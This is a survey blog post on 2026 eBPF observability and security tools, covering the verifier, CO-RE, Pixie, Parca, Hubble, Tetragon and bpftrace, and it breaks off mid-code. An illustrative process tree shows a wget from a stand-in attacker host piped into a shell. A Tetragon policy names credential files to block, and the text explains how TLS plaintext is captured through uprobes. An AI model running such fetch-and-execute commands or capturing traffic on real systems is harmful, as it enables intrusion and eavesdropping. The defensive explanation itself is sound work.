eBPF Observability 2026: Pixie / Parca / Cilium Hubble / Tetragon / Beyla / Coroot / Falco Deep Dive


2026: The Year eBPF Became Infrastructure's Standard Nervous System

Five years ago, eBPF was treated as "a curious toy for Linux kernel hackers." In 2026, eBPF is the de-facto standard in:

- **Networking** — Cilium powers GKE Dataplane V2, is the default CNI in EKS Anywhere, and backs Azure CNI Powered by Cilium on AKS; it can also replace kube-proxy

- **Observability** — Pixie, Parca, Beyla, and Coroot made "auto-instrumentation without code changes" real

- **Security** — Tetragon and Falco are the de-facto standards for runtime security

- **Scheduling** — sched_ext (CONFIG_SCHED_CLASS_EXT) landed in the Linux mainline at 6.12; Meta and Google run custom schedulers in production

- **Power** — Kepler entered CNCF Incubating and became the de-facto standard for measuring data-center carbon footprint

This post walks the 2026 eBPF landscape top to bottom: what each tool does, why it works that way, and how Korean and Japanese big-tech adopted it.

1. eBPF in 2026 — The Four Domains Where It Won

Let us draw the big picture first. eBPF is solidifying as the standard in four areas simultaneously.

┌──────────────────────────────────────────────────────────────────────────┐

│ eBPF — De-Facto Standards by Domain (2026) │

├──────────────────────────────────────────────────────────────────────────┤

│ Network / CNI │ Cilium (CNCF Graduated 2023) │

│ - Network observ. │ Hubble (sister project) │

│ - kube-proxy repl. │ Cilium kube-proxy replacement │

│ - Service mesh │ Cilium Service Mesh (sidecarless Envoy) │

├──────────────────────────────────────────────────────────────────────────┤

│ Observ. (tracing) │ Pixie (CNCF Sandbox, New Relic-backed / OSS) │

│ Observ. (profiling) │ Parca / Grafana Pyroscope │

│ Observ. (auto-instr.) │ Grafana Beyla / OpenTelemetry eBPF Collector │

│ Observ. (auto-infer) │ Coroot │

│ k8s diagnostics │ Inspektor Gadget (Microsoft, CNCF Sandbox) │

├──────────────────────────────────────────────────────────────────────────┤

│ Security (runtime) │ Falco (CNCF Graduated 2024) / Tetragon (Isovalent) │

│ - Policy signals │ Cilium Tetragon │

│ - Syscall auditing │ Falco │

├──────────────────────────────────────────────────────────────────────────┤

│ Power / Sustainability│ Kepler (CNCF Incubating) │

│ Scheduling │ sched_ext (Linux 6.12+, Meta scx schedulers) │

└──────────────────────────────────────────────────────────────────────────┘

The interesting thing is that all four domains rest on a single technology: "running verified code safely inside the kernel." How that is possible is the next chapter.

2. eBPF Fundamentals — Why You Can "Safely" Extend the Kernel

eBPF stands for extended Berkeley Packet Filter, but its name is far narrower than what it actually is. The essence is "a virtual machine that lets user-space load small programs that the kernel runs, verified, in kernel context."

Traditional kernel-extension options

1. **Kernel modules (`.ko`)** — Powerful but dangerous; a bad module panics the kernel

2. **kprobes / uprobes / tracepoints** — Safe but data collection is limited

3. **systemtap** — Looks like a scripting language, but ultimately compiles to a kernel module

The eBPF approach

User space:    [C source] ──▶ [Clang/LLVM] ──▶ [eBPF bytecode]

Kernel space:  [eBPF bytecode] ──▶ [Verifier] ──▶ [JIT compiler] ──▶ [native code]

Attached to:   [hook: kprobe, tracepoint, XDP, sched ...]

The heart is the **verifier**. Before loading, every eBPF program is checked for:

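- **No unbounded loops** — Every loop must have a bound the verifier can prove (bounded loops are accepted since Linux 5.3; earlier kernels rejected all backward jumps)

- **Only valid memory access** — Pointer tracking, range checks

- **Guaranteed termination** — The verifier analyzes at most 1M instructions per program (Linux 5.2+; the earlier program-size cap was 4,096 instructions)

- **Only approved kernel entry points** — You cannot call arbitrary kernel functions; only helpers (and, on newer kernels, kfuncs) that the kernel explicitly exposes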

Thanks to the verifier, users can write "code that runs in the kernel yet cannot brick the kernel." This is the magic of eBPF.
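To make the checks above concrete, here is a deliberately tiny sketch of the idea in Python. It is not the kernel verifier: the instruction format (`("op",)`, `("jmp", target)`, `("exit",)`) and the function name `toy_verify` are invented for illustration, and the toy rejects every backward jump outright, which is closer to pre-5.3 behavior than to today's bounded-loop analysis.

```python
from typing import List, Tuple

# Hypothetical toy instruction set, not real eBPF bytecode:
#   ("op",)          any straight-line instruction
#   ("jmp", target)  jump to the absolute index `target`
#   ("exit",)        end of program
Insn = Tuple

MAX_INSNS = 1_000_000  # mirrors the cap mentioned in the text


def toy_verify(prog: List[Insn], max_insns: int = MAX_INSNS) -> Tuple[bool, str]:
    """Accept or reject a toy program using three simplified rules."""
    if not prog:
        return False, "empty program"
    if len(prog) > max_insns:
        return False, "program too large"
    if prog[-1][0] != "exit":
        return False, "last instruction must be exit"
    for pc, insn in enumerate(prog):
        if insn[0] == "jmp":
            target = insn[1]
            if not 0 <= target < len(prog):
                return False, f"jump out of range at {pc}"
            if target <= pc:
                # A backward jump could loop forever; the toy rejects it outright.
                return False, f"backward jump at {pc}"
    return True, "ok"


good = [("op",), ("jmp", 2), ("exit",)]
looping = [("op",), ("jmp", 0), ("exit",)]
print(toy_verify(good))
print(toy_verify(looping))
```

The point of the sketch is the shape of the contract: the program is analyzed statically, before it ever runs, and anything the analysis cannot prove safe is refused at load time.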

Lifecycle of an eBPF program

// Hello eBPF (libbpf style)

#include <linux/bpf.h>

#include <bpf/bpf_helpers.h>

SEC("tracepoint/syscalls/sys_enter_openat")

int trace_openat(void *ctx) {

char msg[] = "openat called\n";

bpf_trace_printk(msg, sizeof(msg));

return 0;

}

char LICENSE[] SEC("license") = "GPL";

Compile

clang -O2 -target bpf -c hello.c -o hello.o

Load and attach (with bpftool; the `autoattach` keyword needs a recent bpftool, roughly v7.1 or newer)

sudo bpftool prog load hello.o /sys/fs/bpf/hello autoattach

Read the trace

sudo cat /sys/kernel/debug/tracing/trace_pipe

This tiny example shows the magic: every time openat is called, the kernel runs our verified code. Extend the program to read the filename argument and you can track which files any process opens.

3. The CO-RE Revolution — Compile Once, Run Everywhere

The biggest problem with early eBPF was **kernel-version compatibility**. Internal kernel structs differ between versions. For example, a given `task_struct` field might sit at offset 200 on 5.4, 224 on 5.10, and 248 on 6.5 (illustrative numbers; real offsets also depend on the kernel config).

So old-school BCC took the approach of "compile at runtime with Clang against the kernel headers." Downsides:

- Every node needs Clang + kernel headers installed (hundreds of MB)

- Startup takes seconds to tens of seconds

- Running a compiler in production gives ops nightmares

How CO-RE works

CO-RE solves this with BTF (BPF Type Format) and libbpf's relocation feature.

At compile time:

eBPF.c ── Clang/LLVM ──▶ BPF bytecode + BTF info (struct-field reference metadata)

At runtime:

Compare against the running kernel's BTF (/sys/kernel/btf/vmlinux)

──▶ libbpf recomputes offsets

──▶ Patches the memory-access instructions in the bytecode

──▶ Passes the verifier and loads
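The relocation step can be sketched in a few lines of Python. This is a model of the idea only, not libbpf's implementation: the `Load` and `Relocation` classes, the `relocate` function, and every offset below are hypothetical stand-ins for what BTF and the ELF relocation records carry.

```python
from dataclasses import dataclass
from typing import Dict, List

# Field offsets as recorded in BTF. All numbers are made up for illustration.
BUILD_BTF = {"task_struct.real_parent": 200, "task_struct.tgid": 120}
TARGET_BTF = {"task_struct.real_parent": 224, "task_struct.tgid": 128}


@dataclass
class Load:
    """A memory-load instruction: read `size` bytes at base + offset."""
    offset: int
    size: int


@dataclass
class Relocation:
    """Records that instruction `insn_index` accesses the named field."""
    insn_index: int
    field: str


def relocate(insns: List[Load], relocs: List[Relocation],
             target_btf: Dict[str, int]) -> List[Load]:
    """Return a copy of `insns` with offsets patched for the target kernel."""
    patched = [Load(i.offset, i.size) for i in insns]
    for r in relocs:
        if r.field not in target_btf:
            raise KeyError(f"field {r.field} missing on target kernel")
        patched[r.insn_index].offset = target_btf[r.field]
    return patched


# Bytecode compiled against the build machine's layout...
program = [Load(BUILD_BTF["task_struct.real_parent"], 8),
           Load(BUILD_BTF["task_struct.tgid"], 4)]
relocs = [Relocation(0, "task_struct.real_parent"),
          Relocation(1, "task_struct.tgid")]
# ...is patched at load time to match the running kernel.
patched = relocate(program, relocs, TARGET_BTF)
print([i.offset for i in patched])
```

The design choice worth noticing is that the bytecode itself never changes meaning; only the numeric offsets are rewritten, which is why the verifier can still check the patched program afterwards.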

The key macro is `BPF_CORE_READ()`. Old style:

// BCC style (runtime compilation)

struct task_struct *task = (struct task_struct *)bpf_get_current_task();

pid_t ppid;

bpf_probe_read(&ppid, sizeof(ppid), &task->real_parent->tgid);

Modern style:

// CO-RE style (compile once, run anywhere)

struct task_struct *task = (struct task_struct *)bpf_get_current_task();

pid_t ppid = BPF_CORE_READ(task, real_parent, tgid);

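The impact of this small change is enormous. Because the agent no longer bundles Clang and kernel headers, **container images can shrink from roughly 100 MB to around 5 MB**, and startup no longer waits on a compile step. Many modern eBPF tools, including Tetragon, Inspektor Gadget, and Falco's modern eBPF probe, are built on CO-RE.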

BTF required, headers not

As of 2026, Ubuntu 22.04+, RHEL 9+, Amazon Linux 2023+, and Bottlerocket all ship with BTF by default (`/sys/kernel/btf/vmlinux`). For older kernels, BTFHub (https://github.com/aquasecurity/btfhub) provides external BTF.

4. Pixie — The Definitive Kubernetes Auto-Instrumentation Tool

Pixie is the Kubernetes observability platform that New Relic acquired and open-sourced (Apache 2.0). It is a CNCF Sandbox project and was rumored as an Incubating candidate going into 2026.

What Pixie solves

Traditional APM forces one of these on you:

1. Install an agent on every service (Datadog, New Relic APM)

2. Embed an OpenTelemetry SDK in every service via code

3. Deploy a service-mesh sidecar (Istio, Linkerd)

All three require **code or deployment changes**. Pixie's promise is different. **"Install in your cluster with one YAML, and every flow is visible immediately."**

Architecture

┌──────────────────────────────┐

│ Pixie UI / Pixie CLI │

│ PxL query language (Python-ish) │

└──────────────┬───────────────┘

│ gRPC

┌───────────────▼─────────────────┐

│ Pixie Cloud (optional, self-hostable) │

│ or Pixie Vizier (in-cluster) │

└───────────────┬─────────────────┘

┌────────────────────────────┼────────────────────────────┐

▼ ▼ ▼

┌───────┐ ┌───────┐ ┌───────┐

│ PEM │ │ PEM │ │ PEM │

│ (node)│ │ (node)│ │ (node)│

└─┬─────┘ └─┬─────┘ └─┬─────┘

│ eBPF │ eBPF │ eBPF

▼ ▼ ▼

[kernel traces] [kernel traces] [kernel traces]

PEM = Pixie Edge Module (DaemonSet)

Data is held in node memory for 24 hours only (long-term storage via Iceberg/S3 export)

A PEM runs per node and captures the following automatically:

- HTTP/HTTP2/gRPC requests and responses (headers + body)

- MySQL, PostgreSQL, Redis, Kafka, MongoDB queries

- DNS queries

- TCP/UDP connections, retransmits, RTT

- CPU profiles (perf_event)

TLS is visible

The most impressive bit. **HTTPS traffic is visible.** How? Pixie attaches uprobes to OpenSSL's `SSL_read` / `SSL_write` and observes the plaintext right before encryption and right after decryption.

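// Simplified pseudo-code
// OpenSSL signature: int SSL_write(SSL *ssl, const void *buf, int num)
SEC("uprobe/SSL_write")
int trace_ssl_write(struct pt_regs *ctx) {
    const void *buf = (const void *)PT_REGS_PARM2(ctx); // plaintext, not yet encrypted
    int len = (int)PT_REGS_PARM3(ctx);                  // bytes the caller wants to send
    // Send the first N bytes of buf into a perf buffer
    ...
    return 0;
}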

Go binaries are statically linked, which is trickier. Pixie locates Go's TLS-library symbols (`crypto/tls.(*Conn).Read/Write`) and hooks uprobes on them.

PxL query example

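# Per-endpoint HTTP latency quantiles over the last 5 minutes
import px

df = px.DataFrame(table='http_events', start_time='-5m')
df = df[df.resp_status >= 200]
df.endpoint = df.req_path
df = df.groupby('endpoint').agg(
    latency_quantiles=('latency', px.quantiles),
    count=('latency', px.count),
)
# px.quantiles returns a set of quantiles; pluck the ones we want
df.p50 = px.pluck_float64(df.latency_quantiles, 'p50')
df.p99 = px.pluck_float64(df.latency_quantiles, 'p99')
df = df[['endpoint', 'p50', 'p99', 'count']]
px.display(df)
# Sort the resulting table by p99 in the Live UI to find the slowest endpoints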

PxL is a Python-flavored DSL, but is actually compiled and executed by a C++ backend. All queries hit the in-memory data on each PEM, so they are fast.

Limits

- **No long-term storage** — Default 24 hours. To keep data longer, export Pixie to OpenTelemetry and ship to another backend (Honeycomb, Tempo, Iceberg)

- **Resource usage** — A PEM typically consumes 1–2 GB of memory per node, which can be heavy on small nodes

- **HTTPS relies on uprobe matching** — Static OpenSSL linking or unusual TLS libraries make capture tricky

Still, Pixie is the definitive showcase of "what eBPF auto-instrumentation can do."

5. Parca — Continuous Profiling

Parca is the open-source continuous-profiling tool from Polar Signals (the company founded by Frederic Branczyk). It is CNCF Sandbox as of 2026.

What "continuous profiling" means

Traditional profiling was reactive: "Something is wrong, so let me run perf record now and analyze." Continuous profiling is **always-on, low-overhead profiling of every process (typically around 1% CPU), stored for later**. Then post-hoc analysis like "CPU usage spiked last Tuesday at 3 PM" becomes possible.

What sets Parca apart

Alternatives:

- perf record → manual, data is huge

- py-spy / pyroscope → per-language agent

- Datadog Continuous Profiler → paid, proprietary

Parca's take:

- parca-agent: a single DaemonSet per node

- eBPF-based 99 Hz stack sampling via perf_event

- One agent for Go, Rust, C/C++, Python, Java, Node.js

- DWARF-based stack unwinding (no libunwind, all in the kernel)

- pprof-compatible format (Parca Server)

The pain of per-node stack sampling

Sampling stacks at 99 Hz means capturing the call stack of the running function 99 times per second on every CPU. The canonical way is to walk the chain of frame pointers (the rbp register on x86-64), but compilers have long omitted frame pointers by default when optimizing (`-fomit-frame-pointer`).

Two ways out:

1. **Re-enable frame pointers** — Fedora 38+ and Ubuntu 24.04+ now ship their entire library set with frame pointers enabled (a genuinely big shift)

2. **DWARF-based unwinding** — Read the call-frame information in the `.eh_frame` section to derive, for each program counter, how to recover the caller's stack pointer and return address. Parca does this **inside eBPF**

Parca pre-loads DWARF unwind info into BPF maps and uses it at sampling time to reconstruct call stacks. This technique was developed by Polar Signals together with the Linux community, and today the Grafana Pyroscope and Datadog profilers all take the same approach.
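A rough Python model of table-driven unwinding may help here. It is a sketch under strong assumptions, not Parca's code: the table layout, the addresses, and the function names are invented, and every row uses the single simplified rule "CFA = rsp + offset, return address at CFA - 8", whereas real `.eh_frame` data supports many more rule kinds.

```python
import bisect
from typing import Dict, List, Tuple

# Hypothetical unwind table: (start_pc, cfa_offset, function_name), sorted by pc.
# Rule for every row: CFA = rsp + cfa_offset, return address lives at CFA - 8.
UNWIND_TABLE: List[Tuple[int, int, str]] = [
    (0x1000, 16, "main"),
    (0x2000, 32, "handle_request"),
    (0x3000, 8, "parse"),
]
STARTS = [row[0] for row in UNWIND_TABLE]


def lookup(pc: int) -> Tuple[int, int, str]:
    """Find the table row covering `pc` with a binary search."""
    idx = bisect.bisect_right(STARTS, pc) - 1
    if idx < 0:
        raise LookupError(f"no unwind info for pc {pc:#x}")
    return UNWIND_TABLE[idx]


def unwind(pc: int, rsp: int, stack: Dict[int, int], max_depth: int = 64) -> List[str]:
    """Walk from the sampled frame back to the outermost one."""
    frames = []
    for _ in range(max_depth):      # bounded loop, as the verifier would require
        _, cfa_offset, name = lookup(pc)
        frames.append(name)
        cfa = rsp + cfa_offset
        ret = stack.get(cfa - 8, 0)
        if ret == 0:                # no return address: reached the bottom
            break
        pc, rsp = ret, cfa          # the caller resumes at ret with rsp = CFA
    return frames


# Fake stack memory (address -> 8-byte value) for one sample taken inside parse().
stack = {0x7000: 0x2010, 0x7020: 0x1020}
print(unwind(0x3004, 0x7000, stack))
```

The binary search over a pre-sorted table is the part that maps well onto BPF maps: the expensive DWARF parsing happens in user space ahead of time, and the sampling path only does lookups and arithmetic.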

Flame graphs

The collected stack data is rendered as a flame graph — the visualization Brendan Gregg invented.

┌──────────────────────────────────────┐

│ main (100%) │

├────────────┬─────────────────────────┤

│ http (80%) │ db.query (15%) │

├─────┬──────┼────────┬────────────────┤

│a(40)│b(40) │parse(5)│ exec(10) │

└─────┴──────┴────────┴────────────────┘

Horizontal width = CPU-time share

Depth grows downward in this sketch (an icicle layout; classic flame graphs grow upward)
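The aggregation behind such a graph is simple enough to sketch. The snippet below folds raw stack samples into the "root;child;leaf count" form that flame-graph tooling commonly consumes, then computes how wide a frame would be drawn. The sample data is synthetic and shaped to match the diagram; `fold` and `frame_share` are names chosen for this example.

```python
from collections import Counter
from typing import Dict, Iterable, List, Tuple


def fold(samples: Iterable[Tuple[str, ...]]) -> Dict[str, int]:
    """Count identical stacks; keys use the 'root;child;leaf' folded format."""
    return dict(Counter(";".join(stack) for stack in samples))


def frame_share(folded: Dict[str, int], frame: str) -> float:
    """Fraction of samples whose stack contains `frame` (its drawn width)."""
    total = sum(folded.values())
    hits = sum(n for stack, n in folded.items() if frame in stack.split(";"))
    return hits / total if total else 0.0


# Synthetic samples shaped like the diagram (100 samples in total).
samples: List[Tuple[str, ...]] = (
    [("main", "http", "a")] * 40
    + [("main", "http", "b")] * 40
    + [("main", "db.query", "parse")] * 5
    + [("main", "db.query", "exec")] * 10
    + [("main",)] * 5
)
folded = fold(samples)
for stack, count in sorted(folded.items()):
    print(stack, count)
print("http share:", frame_share(folded, "http"))
```

Because identical stacks collapse into one counter, storage grows with the number of distinct code paths rather than with the number of samples, which is a large part of why always-on profiling is affordable.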

Parca vs Pyroscope vs Datadog

| Tool | Open source | Single agent, many langs | DWARF unwinding | Backend |
|------|-------------|--------------------------|-----------------|---------|
| Parca | Apache 2.0 | Yes | Yes | Parca Server (Go) |
| Grafana Pyroscope | AGPL | Partial (separate eBPF agent) | Yes | Pyroscope Server |
| Datadog | Closed | Yes | Yes | SaaS |
| pprof + go pprof | Standard | No | Compiler-dependent | File |

The 2026 trend is convergence on Grafana Pyroscope + Parca-compatible format. pprof has effectively become the standard interchange format.

6. Cilium Hubble — Kubernetes Network Observability

Cilium became CNCF Graduated in 2023. As of 2026 it underpins GKE Dataplane V2 and Azure CNI Powered by Cilium on AKS, and is the default CNI in EKS Anywhere. Hubble is Cilium's sister project, observing network flows.

Limits of kube-proxy

The classic kube-proxy uses iptables or IPVS rules for ClusterIP routing. Problems:

- As the service count grows, iptables rules balloon into tens of thousands — O(n) matching per packet (IPVS is hashed but has conntrack overhead)

- No L7 routing

- Poor policy visibility (no way to see why a packet was dropped)

Cilium's approach

TC ingress hook ──▶ eBPF program ──▶ routing / policy / logging

├─▶ DROP / FORWARD / REDIRECT

└─▶ emit event to Hubble

kube-proxy replacement: service mappings live in BPF maps, O(1) lookup per packet

Network policy: L3–L7 evaluated entirely in BPF

Service mesh: Envoy runs sidecarless (per-node)
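The O(n) versus O(1) difference is easy to see in a small model. The sketch below is not how iptables or Cilium are implemented; it only contrasts an ordered rule scan with a hashed lookup, using a Python dict as a stand-in for a BPF hash map. The addresses, ports, and function names are made up.

```python
from typing import Dict, List, Optional, Tuple

Service = Tuple[str, int]   # (cluster IP, port)
Backend = str               # "podIP:port"


def linear_lookup(rules: List[Tuple[Service, Backend]],
                  key: Service) -> Tuple[Optional[Backend], int]:
    """iptables-style: scan rules in order; returns (backend, rules_examined)."""
    for examined, (svc, backend) in enumerate(rules, start=1):
        if svc == key:
            return backend, examined
    return None, len(rules)


def map_lookup(table: Dict[Service, Backend], key: Service) -> Optional[Backend]:
    """Hash-map-style: one hashed lookup regardless of table size."""
    return table.get(key)


# 10,000 synthetic services.
rules = [((f"10.96.{i // 256}.{i % 256}", 80), f"10.0.{i // 256}.{i % 256}:8080")
         for i in range(10_000)]
table = dict(rules)
last = rules[-1][0]

print(linear_lookup(rules, last))   # walks every rule before matching
print(map_lookup(table, last))      # single lookup
```

In the worst case the linear scan touches every rule for a single packet, while the map lookup cost stays flat as services are added.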

Hubble UI

Hubble collects the flow events Cilium emits and presents:

- Real-time service-dependency graph

- L7 metrics (HTTP status distribution, method distribution)

- DNS query flows

- Policy violations (with DENY reason included)

Live flow tail

hubble observe --namespace prod --follow

Mar 15 10:23:01.234 prod/frontend-7f6d-xqz -> prod/api-3-abc:8080 SYN

Mar 15 10:23:01.235 prod/frontend-7f6d-xqz -> prod/api-3-abc:8080 ACK

Mar 15 10:23:01.240 prod/frontend-7f6d-xqz -> prod/api-3-abc:8080 HTTP/1.1 GET /v1/users/me (200, 5ms)

L7 stats

hubble observe --http-status 500 --since 5m --output table

Cilium Network Policy example

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: api-only-from-frontend
spec:
  endpointSelector:
    matchLabels:
      app: api
  ingress:
    - fromEndpoints:
        - matchLabels:
            app: frontend
      toPorts:
        - ports:
            - port: '8080'
              protocol: TCP
          rules:
            http:
              - method: GET
                path: '/v1/.*'
              - method: POST
                path: '/v1/orders'

This policy enforces all the way down to L7 (HTTP method + path). The classic NetworkPolicy cannot do that.
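To show what the HTTP rules in that policy mean in practice, here is a minimal Python evaluator for the same two rules. It is a sketch of the semantics rather than Cilium's or Envoy's code: it assumes the path regex must match the whole path, and it compares methods by plain equality even though the real field also accepts a regex.

```python
import re
from typing import List, Tuple

# (method, path regex) pairs copied from the policy.
HTTP_RULES: List[Tuple[str, str]] = [
    ("GET", r"/v1/.*"),
    ("POST", r"/v1/orders"),
]


def allowed(method: str, path: str,
            rules: List[Tuple[str, str]] = HTTP_RULES) -> bool:
    """Allow the request only if some rule matches both method and full path."""
    return any(
        method == rule_method and re.fullmatch(rule_path, path) is not None
        for rule_method, rule_path in rules
    )


for method, path in [("GET", "/v1/users/me"), ("POST", "/v1/orders"),
                     ("POST", "/v1/users"), ("DELETE", "/v1/orders")]:
    print(method, path, "->", "ALLOW" if allowed(method, path) else "DENY")
```

Anything that matches no rule is denied, which is the default-deny behavior that makes an allow-list policy like this one meaningful.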

Hubble Timescape

Hubble Timescape, part of Isovalent's enterprise offering, persists Hubble flow data for long-term retention, enabling "what did our traffic patterns look like last week?" analysis. Critical for post-incident forensics.

7. Tetragon — Isovalent's Security Observability

Tetragon is the security-observability / runtime-security tool from Isovalent (now part of Cisco), the creators of Cilium. It is developed as a Cilium sub-project under the CNCF and reached 1.0 in 2023.

How it differs from Falco

Falco hooks system calls and evaluates rules. Tetragon is similar but differs as follows:

| Aspect | Falco | Tetragon |
|--------|-------|----------|
| Hook approach | Modern eBPF probe (libbpf, CO-RE) by default; kernel module also available | Pure eBPF, CO-RE based |
| Policy language | YAML rules (Sysdig-compatible) | TracingPolicy (CRD) |
| Real-time enforcement | Detection only; responses are handled by external tooling | Strong (sigkill, override) |
| Process context | Rich | Rich + parent / grandparent / exec ancestry |
| k8s integration | Good | Very strong (auto-attaches Pod metadata) |

What real-time enforcement means

Tetragon can issue SIGKILL to a violating process via the BPF helper `bpf_send_signal()`. Meaning: this is not "detect then notify" — it is "detect and block in the same breath."

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: block-sensitive-file-access
spec:
  kprobes:
    - call: 'security_file_open'
      syscall: false
      args:
        - index: 0
          type: 'file'
      selectors:
        - matchArgs:
            - index: 0
              operator: 'Prefix'
              values:
                - '/etc/shadow'
                - '/etc/passwd'
          matchActions:
            - action: 'Sigkill'

Once this policy is in place, the instant any process tries to open `/etc/shadow`, SIGKILL fires from inside the kernel. There is no user-space agent waking up to make a decision. This works because verified code runs directly inside the kernel.
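The selector logic in that policy boils down to a prefix test followed by an action. The Python sketch below models it under stated assumptions: `match_action` and its `enforce` flag are hypothetical names for this example, and returning `"Post"` in alert-only mode is a stand-in for "report the event without killing", not a claim about Tetragon internals.

```python
from typing import List, Optional

SENSITIVE_PREFIXES = ["/etc/shadow", "/etc/passwd"]  # values from the policy


def match_action(path: str, prefixes: List[str] = SENSITIVE_PREFIXES,
                 enforce: bool = False) -> Optional[str]:
    """Return the action for a file-open event, or None if no selector matches.

    enforce=False models an alert-only rollout (hypothetical flag for this sketch).
    """
    if any(path.startswith(p) for p in prefixes):
        return "Sigkill" if enforce else "Post"
    return None


for path in ["/etc/shadow", "/etc/shadow-", "/etc/passwd", "/etc/hosts"]:
    print(path, "->", match_action(path, enforce=True))
```

Note that a prefix operator also matches `/etc/shadow-` and similar siblings, and that many ordinary programs read `/etc/passwd`. Running the same selectors in a report-only mode first is a cheap way to see what enforcement would have killed.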

Process ancestry

Another Tetragon highlight: every event can trace "how this process came to exist."

process sshd (pid 1234, uid 0)

└─ bash (pid 1235, uid 0)

└─ wget http://attacker.com/x.sh (pid 1240, uid 0)

└─ sh x.sh (pid 1241, uid 0)

└─ /tmp/x (pid 1245, uid 0) <- violation

The ancestry is built by walking `task_struct->real_parent` in eBPF. In incident analysis, you can immediately see "where this small violation actually started."
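The parent walk itself is a short bounded loop. Here is a Python sketch over a hand-written process table that mirrors the tree above; the `PROCS` dictionary, the `systemd` root at pid 1, and the `ancestry` function are assumptions made for this example rather than Tetragon data structures.

```python
from typing import Dict, List, Tuple

# pid -> (parent pid, command); mirrors the tree above. pid 1 is an assumed root.
PROCS: Dict[int, Tuple[int, str]] = {
    1: (0, "systemd"),
    1234: (1, "sshd"),
    1235: (1234, "bash"),
    1240: (1235, "wget http://attacker.com/x.sh"),
    1241: (1240, "sh x.sh"),
    1245: (1241, "/tmp/x"),
}


def ancestry(pid: int, procs: Dict[int, Tuple[int, str]] = PROCS,
             max_depth: int = 32) -> List[str]:
    """Follow parent links from `pid` to the root, oldest ancestor first."""
    chain: List[str] = []
    for _ in range(max_depth):   # bounded walk, in the spirit of eBPF loops
        if pid not in procs:
            break
        parent, comm = procs[pid]
        chain.append(comm)
        pid = parent
    return list(reversed(chain))


print(" -> ".join(ancestry(1245)))
```

The `max_depth` bound matters for the same reason it does in kernel code: a walk over parent pointers has to terminate even if the data is unexpectedly deep or cyclic.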

8. BCC + bpftrace — The Classics for Ad-Hoc Tracing

If the tools above are "production daemons," BCC and bpftrace are the "engineer SSHes in and runs them directly" tools. They became standard after Brendan Gregg's book "BPF Performance Tools" (2019).

BCC vs bpftrace

- **BCC**: A larger framework with Python or C++ wrappers. Lots of complex tools (`opensnoop`, `execsnoop`, `biolatency`, `tcplife`, ... 200+ tools)

- **bpftrace**: An awk-style one-line DSL. Lets you trace on the spot

bpftrace one-liner magic

1) Which process opens which file (3 seconds)

sudo bpftrace -e 'tracepoint:syscalls:sys_enter_openat { printf("%s opens %s\n", comm, str(args->filename)); }' -c 'sleep 3'

2) vfs_read latency histogram (VFS-level reads, which include page-cache hits, not only disk I/O)

sudo bpftrace -e '

kprobe:vfs_read { @start[tid] = nsecs; }

kretprobe:vfs_read /@start[tid]/ {

@ns = hist(nsecs - @start[tid]);

delete(@start[tid]);

}

'

3) Which kernel stacks are on-CPU most (10 seconds; bpftrace prints the highest counts last)

sudo bpftrace -e 'profile:hz:99 { @[kstack(3)] = count(); }' -c 'sleep 10' | tail -20

4) Where TCP retransmits are going

sudo bpftrace -e '

kprobe:tcp_retransmit_skb {

$sk = (struct sock *)arg0;

printf("retransmit %s\n", ntop($sk->__sk_common.skc_daddr));

}

'
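The `hist()` call in the second one-liner groups values into power-of-two buckets. A small Python sketch of that bucketing follows; it illustrates the idea only (function names are chosen for this example, and non-positive values are lumped into a single `[0, 1)` bucket for simplicity).

```python
from collections import Counter
from typing import Dict, Iterable, Tuple


def bucket(value: int) -> Tuple[int, int]:
    """Return the half-open power-of-two range [lo, hi) that contains `value`."""
    if value <= 0:
        return (0, 1)
    lo = 1 << (value.bit_length() - 1)
    return (lo, lo * 2)


def log2_hist(values: Iterable[int]) -> Dict[Tuple[int, int], int]:
    """Count values per power-of-two bucket."""
    return dict(Counter(bucket(v) for v in values))


latencies_ns = [700, 900, 1500, 3000, 3500, 120_000]  # synthetic samples
for (lo, hi), count in sorted(log2_hist(latencies_ns).items()):
    print(f"[{lo}, {hi})".ljust(20), "@" * count)
```

Logarithmic buckets keep the map tiny (a few dozen keys cover nanoseconds to seconds), which is why this kind of histogram can be maintained in kernel space at very high event rates.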

BCC's standard toolset

After installing `bpfcc-tools` (Ubuntu/Debian, where each tool gets a `-bpfcc` suffix under `/usr/sbin/`) or `bcc-tools` (RHEL/Fedora, under `/usr/share/bcc/tools/`), you can run tools such as these (Ubuntu/Debian names shown):

Which processes are starting

sudo execsnoop-bpfcc

Which files are being opened

sudo opensnoop-bpfcc

TCP connection lifetimes

sudo tcplife-bpfcc

Block-I/O latency histogram

sudo biolatency-bpfcc

Top CPU consumers

sudo profile-bpfcc 10

Why these tools matter

Pixie, Parca, and Hubble above are "always-on" tools. BCC/bpftrace are the "give me an answer right now during this incident" tools. You need both.

Brendan Gregg's "Systems Performance" (2nd ed., 2020) and "BPF Performance Tools" (2019) are the canonical references for this space.

9. OpenTelemetry eBPF Collector + Grafana Beyla — Standardizing Auto-Instrumentation

OpenTelemetry is the CNCF observability standard. In 2025, eBPF-based auto-instrumentation solidified along two paths.

OpenTelemetry eBPF Collector

opentelemetry-ebpf is an official OpenTelemetry component, driven primarily by Splunk. It auto-collects:

- Network-flow metrics (kprobe based)

- DNS, TCP, UDP stats

- Pod/Service/Workload labeling (k8s integration)

It exports OTLP, so any backend (Tempo, Jaeger, Honeycomb, Datadog) can consume it.

Grafana Beyla

Beyla is Grafana Labs' Go-based eBPF auto-instrumentation agent. GA in 2024. Features:

- Auto-recognizes HTTP, gRPC, SQL, Redis traffic via uprobes

- Captures plaintext from TLS traffic by hooking OpenSSL/Go TLS functions

- Extracts distributed-trace context (W3C traceparent)

- Exports to OTLP, Prometheus, Mimir
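For readers unfamiliar with the `traceparent` header mentioned above, here is a minimal Python parser for the version-00 format (`version-traceid-parentid-flags`). It is a sketch, not Beyla's implementation: the `TraceContext` type and `parse_traceparent` function are names invented for this example, and the parser only accepts the exact four-field layout.

```python
import re
from typing import NamedTuple, Optional

# Four lowercase-hex fields: 2, 32, 16, and 2 characters long.
_TRACEPARENT = re.compile(
    r"^([0-9a-f]{2})-([0-9a-f]{32})-([0-9a-f]{16})-([0-9a-f]{2})$"
)


class TraceContext(NamedTuple):
    version: str
    trace_id: str
    parent_id: str
    sampled: bool


def parse_traceparent(header: str) -> Optional[TraceContext]:
    """Parse a traceparent header; return None if it is malformed."""
    m = _TRACEPARENT.match(header.strip())
    if m is None:
        return None
    version, trace_id, parent_id, flags = m.groups()
    # The spec forbids version ff and all-zero trace or parent ids.
    if version == "ff" or set(trace_id) == {"0"} or set(parent_id) == {"0"}:
        return None
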